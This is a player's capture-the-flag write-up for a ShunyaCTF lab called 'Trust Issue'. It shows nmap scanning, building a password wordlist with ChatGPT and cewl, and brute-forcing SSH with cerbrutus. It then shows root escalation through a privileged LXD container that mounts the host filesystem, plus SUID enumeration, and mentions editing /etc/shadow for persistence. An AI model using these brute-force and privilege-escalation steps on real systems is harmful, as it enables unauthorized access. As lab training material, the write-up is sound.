Trust Issue — ShunyaCTF{Finals}
Trust Issue Points-999
(Exact description I am unable to get now. But it said something like this)
Description
Meet aalu.
His friend told him to put a strong password on his ssh server and shared a wikipedia article on munged password. Poor aalu was drunk and put a random word from the article as his password. fortunate for him, the password was atleast 8 chars long. Go rock him, shock him.
Try to scan after 15 min of the machine start
(Most Of the people couldn’t find that 420 port because i guess it was getting start after sometimes )
nmap -T4 -p- nmap/intial $ipOUTPUT➖
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
420/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
Then i simply just copy the whole page and paste that into ChatGPT &
write a prompt like make a wordlists from this word and add 123 at everyword ending
It made me that password wordlist in just a minute (I have seen many of the player using cewl tool)
I understand that ChatGPT doesn’t always function perfectly according to my needs. However, I have always relied on it as my Plan A. I ran the command and waited for the output, but it didn’t provide the result I expected.
cewl https://en.wikipedia.org/wiki/Munged_password -w wordlists0.txt -m 8 --with-numbers -d 0But ChatGTP rocks everyone shocks 🥳
python3 cerbrutus.py $ip -p 420 SSH -u "aalu" -P /home/user/CTF/trustIssue/wordlist.txt
Now i have the Password
protection123
ssh aalu@$ip -p 420
Now There were 2 Ways to get Root Acces
# Method 1 — ( That’s Not the intended way to Solve that Lab )
{ In that CTF i have solve it in this way it took me just 1,2 minutes }
LXD
LXD is a next generation system container and virtual machine manager. It offers a user experience similar to virtual machines but using Linux containers instead. It’s image based with pre-made images available for a wide number of Linux distributions and is built around a very powerful, yet pretty simple, REST API.
groupsif you see you are in the groups of lxd
In this method the machine does not required internet
Download this to our kali machine:-
python -m http.server 8080Victim machine
wget http://IP:8080/alpine-v*.**.tar.gzlxd initClick enter all the quetion
lxc image import ./apline-v*.**.tar.gz --alias privescto check the image is set
lxc image listlxc init privesc privesc-container -c security.privileged=trueto check
lxc listlxc config device add privesc-container mydevice disk source=/ path=/mnt/root recursive=truelxc start privesc-containerto check it should start RUNNING
lxc listlxc exec privesc-container /bin/shNow You are root
ScreenShot :-
Before Finding the Flag i would like to take the normal shell of the root to be persistent in this machine so its simple EDIT the etc/shadow file BUT Remember nano, vim are not working in this lxd container. So now what i have a second plan
How to get flag.txt in this machine In the Method 2 Part ;)
# Method 2
SUID (Set User ID)
find / -type f -perm -4000 2>/dev/null
womp -h
Boom!!! Now You are Root :)
Flag.txt
so this part was like there are 3 type of file one files there were written shunyaCTF{iaminsane fakeflag} and in the 2 files there were written random gibberish in the 3rd file there is our flag
So i notice something like one there is written shunyaCTF and other one doesn’t have that word so as for now we will read those files which have shunyaCTF text written in it and the most command word iaminsane fakeflag we will remove that word from our result by using grep command
grep -r 'shunya' | grep -v 'fakeflag'r, --recursive
Read all files under each directory, recursively,
following symbolic links only if they are on the command
line. Note that if no file operand is given, grep
searches the working directory. This is equivalent to the
-d recurse option.-v,--invert-match
Invert the sense of matching, to select non-matching
lines.
shunyaCTF{1_10V3_h0n3y}~ Jay Tiwari [PaiN05]
I hope you got it how to solve it.
If anyone have Doubts contact me on
instagram : —
https://www.instagram.com/__jayyyy21__/
LinkedIn : —